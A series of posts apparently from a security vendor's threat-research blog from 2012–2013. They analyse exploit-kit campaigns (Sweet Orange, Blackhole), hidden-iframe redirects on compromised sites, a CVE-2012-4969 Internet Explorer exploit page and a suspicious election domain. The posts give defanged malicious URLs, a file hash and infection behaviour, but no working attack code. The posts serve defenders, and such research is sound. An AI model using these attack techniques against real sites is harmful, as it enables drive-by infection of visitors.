Wednesday, November 27, 2013

Health Care Sites Prime Targets for Scammers

A few weeks ago I wrote a blog about a spear-phishing campaign trying to capitalize on Americans desperate for information on the ever changing healthcare laws.  Today, I'll be reviewing another such attack.  The threat in question appears to not be downloading any malicious content at the time of publication, but I will detail that the compromised site is still hosting malicious obfuscated JavaScript in order to redirect victims to third party content before viewing the site.

The site in question is hxxp://

Below is a screenshot of the obfuscated JS (JavaScript), redirecting the user's traffic to another site.

The precise path in question is highlighted in Blue.
Once deobfuscated, we see that there is an injected hidden iFrame, which redirects the victim to a site previously registered out of the Ukraine.  This would typically spell disaster, but luckily for victims, right now the site is returning a 404 page not found error.  A quick look up on Google will yield some information on other attempts at this attack.

Note the hidden iFrame
The conclusion that we can come to is that health care is a hot topic.  Users should be practicing Better Browsing practices, especially when the topic they are researching is primary subject matter for Scammers!  Mind your clicks.

Friday, October 11, 2013

Sweet Orange Dropping some Sweet Botnet action

I recently saw a very thorough blog on a new flavor of the Sweet Orange Exploit Kit and thought I might throw in some additional research I found. So let's start with what we know!

There are several hacked Wordpress and Joomla sites that are clearly continuing without being picked up by those administering the sites. One such example is seen in the screen shot below:

The first line is a hidden iframe taking you to Sweet Orange EK.
I've seen numerous other sites listed as referralurls for this malicious activity based on a search of transactions carried out on the IP listed in the same class C as mentioned in prior research (

The idea here is that the attackers take control of a legitimate site, redirect the user to their EK via a hidden iFrame, assess their Java version, and strike accordingly.  All of this is highly reproducible in the lab.

The malicious iFrame leads to your very own Sweet Orange EK!

I won't go into too much detail about the actual .jar file inspection since it was done so thoroughly here.  I will say that it is checking for a Java version 1.7 or greater and that it is manipulating the system via CVE-2013-2460.  The end result is a dropped executable on the victim's machine.  This executable displays botnet activity by doing regularly scheduled POSTs back to a single IP in all instances ran.

I did some Behavioral Analysis on the executable dropped this way and found that it is contacting an IP (

POST activity made
All URLs queried by a sample
Victims of this attack can be expected to contact this same address every 9 minutes based on historical data of this threat in action in our lab.  It is able to achieve this by creating a file with administrative writes in the All Users directory in Windows.

The file name is randomly generated.
9 Minute intervals of phone home transactions
I hope this helps administrators or other researchers, who actively monitor for botnet activity related to this threat.

Friday, September 20, 2013

Blackhole Exploit Kit's(BEK) new variant !

BEK new variant spreading in the wild. The URL pattern observed this time is '/restores/path-matters.php'. While doing log analysis we found some live instances of BEK. 

URLs found:

Redirection chain:
hxxp:// -> hxxp://
"" loads an iFrame into the browser. Which on execution loads the EK URL. 

iFrame Redirection to EK request,

EK Request,

On execution of above JavaScript, it exploits the JAVA vulnerability and download's malware on victim's machine.

Post EK execution,

VT Result:
JAR file : 8/48
EXE file:  32/48

For more info read following blogs
Blackhole exploit kit v2 on the rise 
Analysis of a Blackhole Exploit page
Expack continues exploiting Java vulnerability

Stay away from BEK, Stay safe!


Saturday, October 20, 2012

Poortego: Intelligence for the 99%

The past few weeks I've had the pleasure of attending and presenting at SecTor and RSA Europe.  The topic of my presentation was on a project that I have been working on in my "spare" time - I call the project "Poortego" an intelligence tool for the 99%.  The code and presentation materials can be accessed here:

Warning: this project is in its infancy and is still in a state of initial development versus being a polished tool.

The premise of the project is that there are few tools that fall into the niche of being a threat intelligence tool and many of them are quite expensive solutions (e.g., Palantir and Analyst Notebook) - one outlier is Maltego which is "affordable" but it does have its limitations (particularly if you are using the Community Edition).  Some limitations include, that it is closed-source, out-of-the box relies on the Paterva servers (an issue for those with sensitive data), limited export capability, and restrictions on inputs to transform operations (limited to a single entity).  Note: Maltego is an excellent / mature tool in the intelligence space - the limitations that I listed are not meant to be a slight against the tool or the company.

Poortego is a completely free and open-source project written entirely in Ruby, leverages ActiveRecords for flexible backend support, leverages Rex::UI for the command-line interface, and can run as a stand-alone application or as a Metasploit plugin.
Poortego uses its own backend and framework for storage and data manipulation - no reliance on other projects (e.g., Maltego or Metasploit).  Poortego supports the notion of data transforms and support for the importing and exporting of data into different formats.  The bulk of my development time thus far has been on the framework, so I have not spent a ton of time on transform and import / export plugins yet - only a few are present in the initial code base.  Poortego currently has Graphviz export support as its only visualization component.  I've recently gotten turned on to neo4j and am investigating its usage for storage and visualization of intelligence -- much more to come!

In order to illustrate the value of intelligence and Poortego's usage from both attacker and defender perspectives - I presented some demonstrations.

The first demonstration (defender) was from analysis of an incident impacting one of Zscaler's customers.  I observed some strange and unknown beaconing activity from a customer - there was not much information on the URL/domain, but I was able to tie the IP address of the server to other domains which were related to a malware sample in the open-source:

Furthermore, taking the information on the malware sample and related domains, I was able show that there was a relationship to a ThreatExpert report on 2008 targeted attacks against the Pentagon.

Note: all of the link graphs are Graphviz exports from Poortego.

The attacker-perspective demonstration that I presented was to stage an attack against the RSA Europe conference using nothing more than intelligence.  I wrote a transform for Poortego to retrieve, parse, and store presentation, speaker, moderator, panelist, and company relationships from the RSA EU Event Catalog.  Obviously one could further exploit the knowledge of the relationships and do social networking enumeration - but I wanted to do something less obvious.  The Event Catalog also included all of the presentations in PDF format - I wrote another Poortego transform to retrieve the PDF files and run ExifTool on the PDFs to extract out the author information and include an author relationship to the presentations.  It was interesting to see the number of presentations that had a different author than speaker -- there were two major outliers in this respect...

Unfortunately I was just informed that there were some complaints regarding this particular demo, in order to not fuel the fire, I'm redacting this section of the post.  There was no ill intent and all information used was OSINT.  It goes to show the sensitivity in the security industry the moment potential offensive tactics are shown.  

While I present a project / tool (Poortego) - I also stress that it is not the tools that create the intelligence but the analysts / people.  Tools can certainly help facilitate though!  Please reach out to me if you are interested in contributing to the project - there is still a lot of work to do to make this a well polished tool.

Wednesday, September 19, 2012

A CVE-2012-4969 ("MS IE 0-Day") Seen In The Wild

Here is an example of page that we have observed serving the CVE-2012-4969 exploit in the wild:

hxxp:// invitation [.] spacegas [.] com /Join-Id.html

The page itself appears to be a virtual meeting request (e.g., WebEx or JoinMe):

Possibly a social engineering lure sent over email, as no HTTP referrer strings were observed in the transactions.

The source of the page includes a trailing iframe pointing to a page (join.html) directly on the same IP (

This join.html page serves the CVE-2012-4969 exploit code:

"Moh2010.swf" is a common file-name seen related to this particular threat (just do a Google search for the file).  The MD5 of the Flash file that we pulled down was: 501cf420b5495874d6c795804ce21fd8, and is also encrypted with the DoSWF encryptor.

Using the Anubis sandbox to run the exploit and the malware embedded in the Flash file, the following report was generated: here.

While we see a registry key created:
HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​Internet Explorer\​International\​CpMRU

And a mutex set:

Further community analysis shows that someone uploaded the dropped malware to VirusTotal - which shows the dropped malware as a Delphi RAT (possibly a Hupigon variant) - reported here.

Thursday, September 13, 2012

A Possible Fake Obama Page

I noticed this site being accessed this morning:

www [dot] obama2012 [dot] com

It certainly looks like a legit domain, but fell into that "uncategorized" bucket.

Currently when you visit the page, it redirects you to a Google search for "barak Obama" - notice the mis-spelling of "Barack" as well as the mixed upper and lower cases for the name.  Needless to say this started looking suspect.

The domain was registered using Whois Privacy Protection and leverages name servers from FABULOUS.COM:

FABULOUS.COM provides a parking service for domains, though several seen in the past have had poor reputation, e.g., 

The site is currently resolving using a round-robin from Savvis:

Further analysis of the IPs in the round-robin show open-source info reporting them to be used in phishing and malware schemes in past - though this is more of a reflection of past abuse on Savvis.

If/when this domain is un-parked and used it will be interesting to see what type of content it serves.  Furthermore, as the election grows near it'll be interesting to track some of the malware and fraud schemes capitalizing on the event. 

Thursday, August 16, 2012

Aggressive Activity on

I've noticed an increase in activity to resulting from JS inclusions on mass-compromised WordPress sites.  For example, the site "" has an included file on its main page ""

That contains a simple unescape / document write JS script:

That includes content from a source from site hosted on

There are a number of domains involved in this campaign on leveraging dynamic DNS providers.  Domains, such as:
Given the large number of domains seen (>80) - it is likely that there is domain generation and rotation logic being used in this campaign.

CleanMX has observed and listed a handful of involved domains here.
Unfortunately, my attempts thus far to replay transactions has resulted in 0 byte 200 responses or redirect to another page with a 0 byte response (i.e., nothing useful). lists some of the sites involved as "Trojan.JS.Redirector.cq."  Based on the logs that I've seen it appears that it is a redirector campaign to Blackhole - if/when I receive any related samples I will make an update to this post.

In large part I have noticed that the IP address and domains are not in most block lists - so I wanted to make a note of this activity.